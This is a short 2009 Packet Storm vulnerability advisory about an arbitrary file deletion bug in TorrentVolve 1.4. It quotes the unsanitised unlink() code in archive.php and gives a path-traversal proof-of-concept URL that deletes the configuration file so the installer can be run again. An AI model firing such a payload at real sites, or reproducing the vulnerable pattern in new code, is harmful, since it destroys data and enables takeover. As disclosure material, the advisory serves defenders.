TorrentVolve 1.4 File Deletion

2009-06-11T00:00:00
ID PACKETSTORM:78276
Type packetstorm
Reporter Br0ly
Modified 2009-06-11T00:00:00

Description

                                        
                                            `----------------------------------------------------------------------------------------------------  
  
Name : Torrent Volve  
Site : http://sourceforge.net/projects/torrentvolve/  
Down : http://sourceforge.net/project/showfiles.php?group_id=179905&package_id=207933&release_id=476030  
  
----------------------------------------------------------------------------------------------------  
  
  
Found By : br0ly  
Made in : Brasil  
Contact : br0ly[dot]Code[at]gmail[dot]com  
  
----------------------------------------------------------------------------------------------------  
  
Description:  
  
Bug : Delete Arbitrary file.  
  
Look this in: archive.php; Lines 194 - 199  
  
if(isset($_GET['deleteTorrent'])) {  
  
//delete Torrent from file system  
unlink($userDir . '/' . $_GET['deleteTorrent']);  
echo ' <div class="divStatus">' . $_GET['deleteTorrent'] . ' deleted.</div>' . "\n";  
}  
  
Then after login we can delete files, if you delete the configuration file you can install the script again.  
  
  
----------------------------------------------------------------------------------------------------  
  
P0c:  
  
http://localhost/Scripts/torrentvolve/archive.php?deleteTorrent=../../../config/configuration.xml  
  
To install again go to:  
  
http://localhost/Scripts/torrentvolve/  
  
  
OBS: need register_globals=on;  
  
----------------------------------------------------------------------------------------------------  
  
  
`